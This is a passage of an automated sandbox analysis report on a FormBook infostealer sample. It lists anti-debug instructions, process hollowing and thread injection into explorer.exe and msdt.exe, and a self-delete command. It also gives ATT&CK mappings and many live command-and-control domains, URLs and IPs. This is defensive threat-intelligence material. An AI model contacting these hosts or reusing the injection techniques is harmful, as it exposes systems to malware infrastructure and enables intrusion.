          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C42EF mov eax, dword ptr fs:[00000030h]2_2_017C42EF
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179D2EC mov eax, dword ptr fs:[00000030h]2_2_0179D2EC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179D2EC mov eax, dword ptr fs:[00000030h]2_2_0179D2EC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017972E0 mov eax, dword ptr fs:[00000030h]2_2_017972E0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF2DA mov eax, dword ptr fs:[00000030h]2_2_017CF2DA
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A72D0 mov eax, dword ptr fs:[00000030h]2_2_017A72D0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A72D0 mov eax, dword ptr fs:[00000030h]2_2_017A72D0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A72D0 mov eax, dword ptr fs:[00000030h]2_2_017A72D0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DA2CB mov eax, dword ptr fs:[00000030h]2_2_017DA2CB
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DA2CB mov eax, dword ptr fs:[00000030h]2_2_017DA2CB
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DA2CB mov eax, dword ptr fs:[00000030h]2_2_017DA2CB
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179C2B0 mov ecx, dword ptr fs:[00000030h]2_2_0179C2B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017992AF mov eax, dword ptr fs:[00000030h]2_2_017992AF
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01820267 mov eax, dword ptr fs:[00000030h]2_2_01820267
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01820267 mov eax, dword ptr fs:[00000030h]2_2_01820267
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01820267 mov eax, dword ptr fs:[00000030h]2_2_01820267
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182B264 mov eax, dword ptr fs:[00000030h]2_2_0182B264
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182B264 mov eax, dword ptr fs:[00000030h]2_2_0182B264
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F27E mov eax, dword ptr fs:[00000030h]2_2_0185F27E
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF280 mov eax, dword ptr fs:[00000030h]2_2_017CF280
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF280 mov eax, dword ptr fs:[00000030h]2_2_017CF280
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A3576 mov eax, dword ptr fs:[00000030h]2_2_017A3576
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A3576 mov eax, dword ptr fs:[00000030h]2_2_017A3576
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CF560 mov eax, dword ptr fs:[00000030h]2_2_017CF560
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B255B mov eax, dword ptr fs:[00000030h]2_2_017B255B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B255B mov eax, dword ptr fs:[00000030h]2_2_017B255B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B255B mov eax, dword ptr fs:[00000030h]2_2_017B255B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B255B mov eax, dword ptr fs:[00000030h]2_2_017B255B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B255B mov eax, dword ptr fs:[00000030h]2_2_017B255B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B255B mov eax, dword ptr fs:[00000030h]2_2_017B255B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B255B mov eax, dword ptr fs:[00000030h]2_2_017B255B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DE55C mov eax, dword ptr fs:[00000030h]2_2_017DE55C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0186A5A4 mov eax, dword ptr fs:[00000030h]2_2_0186A5A4
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C1544 mov eax, dword ptr fs:[00000030h]2_2_017C1544
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C1544 mov eax, dword ptr fs:[00000030h]2_2_017C1544
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C1544 mov eax, dword ptr fs:[00000030h]2_2_017C1544
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C1544 mov eax, dword ptr fs:[00000030h]2_2_017C1544
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C1544 mov eax, dword ptr fs:[00000030h]2_2_017C1544
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C1544 mov eax, dword ptr fs:[00000030h]2_2_017C1544
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A2540 mov eax, dword ptr fs:[00000030h]2_2_017A2540
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F5B8 mov eax, dword ptr fs:[00000030h]2_2_0185F5B8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179753F mov eax, dword ptr fs:[00000030h]2_2_0179753F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179753F mov eax, dword ptr fs:[00000030h]2_2_0179753F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179753F mov eax, dword ptr fs:[00000030h]2_2_0179753F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C953A mov eax, dword ptr fs:[00000030h]2_2_017C953A
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181E5C8 mov eax, dword ptr fs:[00000030h]2_2_0181E5C8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181E5C8 mov eax, dword ptr fs:[00000030h]2_2_0181E5C8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A6530 mov eax, dword ptr fs:[00000030h]2_2_017A6530
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DB530 mov eax, dword ptr fs:[00000030h]2_2_017DB530
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DB530 mov eax, dword ptr fs:[00000030h]2_2_017DB530
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018285EA mov eax, dword ptr fs:[00000030h]2_2_018285EA
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C4511 mov eax, dword ptr fs:[00000030h]2_2_017C4511
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C4511 mov eax, dword ptr fs:[00000030h]2_2_017C4511
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B502 mov eax, dword ptr fs:[00000030h]2_2_0179B502
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A45F0 mov eax, dword ptr fs:[00000030h]2_2_017A45F0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A45F0 mov eax, dword ptr fs:[00000030h]2_2_017A45F0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E25D9 mov eax, dword ptr fs:[00000030h]2_2_017E25D9
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D65D0 mov eax, dword ptr fs:[00000030h]2_2_017D65D0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F5C7 mov eax, dword ptr fs:[00000030h]2_2_0179F5C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F549 mov eax, dword ptr fs:[00000030h]2_2_0185F549
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DC5AD mov eax, dword ptr fs:[00000030h]2_2_017DC5AD
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DC5AD mov eax, dword ptr fs:[00000030h]2_2_017DC5AD
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BC590 mov eax, dword ptr fs:[00000030h]2_2_017BC590
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CE597 mov eax, dword ptr fs:[00000030h]2_2_017CE597
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182C56D mov eax, dword ptr fs:[00000030h]2_2_0182C56D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DE58F mov eax, dword ptr fs:[00000030h]2_2_017DE58F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DE58F mov eax, dword ptr fs:[00000030h]2_2_017DE58F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A258C mov eax, dword ptr fs:[00000030h]2_2_017A258C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D3460 mov eax, dword ptr fs:[00000030h]2_2_017D3460
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 34.120.175.65 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.123 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.48.68 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.145 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 7E0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeMemory written: C:\Users\user\Desktop\2FcJgghyXg.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeThread register set: target process: 4884Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 4884Jump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\2FcJgghyXg.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2499808023.0000000001051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BA01000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2502277789.00000000043A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2499028894.0000000000BC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1258733334.0000000000BC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1259038060.0000000001050000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2499808023.0000000001051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeQueries volume information: C:\Users\user\Desktop\2FcJgghyXg.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		121
          Security Software Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium12
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol11
          Archive Collected Data          		Exfiltration Over Bluetooth4
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Virtualization/Sandbox Evasion          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script612
          Process Injection          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common11
          Deobfuscate/Decode Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
          Obfuscated Files or Information          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Timestomp          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1304954 Sample: 2FcJgghyXg.exe Startdate: 07/09/2023 Architecture: WINDOWS Score: 100 34 www.soccercitycupsc.com 2->34 36 www.nazadypro.shop 2->36 38 3 other IPs or domains 2->38 42 Snort IDS alert for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 9 other signatures 2->48 11 2FcJgghyXg.exe 3 2->11         started        signatures3 process4 signatures5 56 Tries to detect virtualization through RDTSC time measurements 11->56 58 Injects a PE file into a foreign processes 11->58 14 2FcJgghyXg.exe 11->14         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 2 1 14->17 injected process8 dnsIp9 28 www.emdefencetech.com 91.195.240.123, 49771, 80 SEDO-ASDE Germany 17->28 30 www.nazadypro.shop 104.21.48.68, 49772, 80 CLOUDFLARENETUS United States 17->30 32 4 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 msdt.exe 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          2FcJgghyXg.exe39%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.mi0%URL Reputationsafe
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://schemas.microsoft.co0%URL Reputationsafe
          http://schemas.micr0%URL Reputationsafe
          http://www.emdefencetech.com0%Avira URL Cloudsafe
          http://www.hot-tubs-59198.bond/us94/www.simarnit.com100%Avira URL Cloudmalware
          http://www.l1z3x.cfd/us94/www.abithashop.com0%Avira URL Cloudsafe
          http://www.b-cr5.ink0%Avira URL Cloudsafe
          http://www.l1z3x.cfd0%Avira URL Cloudsafe
          http://www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL0%Avira URL Cloudsafe
          http://www.hanabi104.online0%Avira URL Cloudsafe
          http://www.b-cr5.inkReferer:0%Avira URL Cloudsafe
          http://www.abithashop.com0%Avira URL Cloudsafe
          http://www.abithashop.comReferer:0%Avira URL Cloudsafe
          http://www.69v39.top/us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL100%Avira URL Cloudphishing
          http://www.truijkl.xyz/us94/www.j5tm84qrs.top100%Avira URL Cloudphishing
          http://www.hot-tubs-59198.bond0%Avira URL Cloudsafe
          http://www.l1z3x.cfd/us94/0%Avira URL Cloudsafe
          http://www.j5tm84qrs.top0%Avira URL Cloudsafe
          http://www.69v39.top/us94/100%Avira URL Cloudphishing
          http://www.soccercitycupsc.comReferer:0%Avira URL Cloudsafe
          http://www.nazadypro.shop/us94/100%Avira URL Cloudmalware
          http://www.emdefencetech.comReferer:0%Avira URL Cloudsafe
          http://www.nazadypro.shop/us94/www.soccercitycupsc.com100%Avira URL Cloudmalware
          http://www.b-cr5.ink/us94/100%Avira URL Cloudmalware
          https://powerpoint.office.comcember0%Avira URL Cloudsafe
          http://www.truijkl.xyz0%Avira URL Cloudsafe
          http://www.j5tm84qrs.top/us94/www.66xecqk.top100%Avira URL Cloudphishing
          http://www.66xecqk.topReferer:0%Avira URL Cloudsafe
          http://www.69v39.top/us94/www.l1z3x.cfd100%Avira URL Cloudphishing
          http://www.soccercitycupsc.com/us94/www.69v39.top0%Avira URL Cloudsafe
          http://www.soccercitycupsc.com/us94/0%Avira URL Cloudsafe
          http://www.66xecqk.top/us94/www.terminalcomputer.info100%Avira URL Cloudphishing
          http://www.j5tm84qrs.top/us94/100%Avira URL Cloudphishing
          http://www.abithashop.com/us94/100%Avira URL Cloudmalware
          http://www.hanabi104.onlineReferer:0%Avira URL Cloudsafe
          http://www.ontheroadfromdamascus.com/us94/100%Avira URL Cloudmalware
          http://www.hot-tubs-59198.bond/us94/100%Avira URL Cloudmalware
          http://www.j5tm84qrs.topReferer:0%Avira URL Cloudsafe
          http://www.66xecqk.top0%Avira URL Cloudsafe
          http://www.terminalcomputer.info0%Avira URL Cloudsafe
          www.l1z3x.cfd/us94/0%Avira URL Cloudsafe
          http://www.nazadypro.shopReferer:0%Avira URL Cloudsafe
          http://www.truijkl.xyzReferer:0%Avira URL Cloudsafe
          http://www.simarnit.com/us94/www.hanabi104.online100%Avira URL Cloudmalware
          http://www.ontheroadfromdamascus.com0%Avira URL Cloudsafe
          http://www.hot-tubs-59198.bondReferer:0%Avira URL Cloudsafe
          http://www.simarnit.com/us94/100%Avira URL Cloudmalware
          http://www.simarnit.com0%Avira URL Cloudsafe
          http://www.emdefencetech.com/us94/100%Avira URL Cloudmalware
          http://www.emdefencetech.com/us94/www.nazadypro.shop100%Avira URL Cloudmalware
          http://www.69v39.topReferer:0%Avira URL Cloudsafe
          http://www.soccercitycupsc.com0%Avira URL Cloudsafe
          http://www.terminalcomputer.info/us94/www.b-cr5.ink100%Avira URL Cloudmalware
          http://www.69v39.top0%Avira URL Cloudsafe
          http://www.abithashop.com/us94/www.truijkl.xyz100%Avira URL Cloudmalware
          http://www.emdefencetech.com/us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL100%Avira URL Cloudmalware
          http://www.truijkl.xyz/us94/100%Avira URL Cloudphishing
          http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bond100%Avira URL Cloudmalware
          http://www.simarnit.comReferer:0%Avira URL Cloudsafe
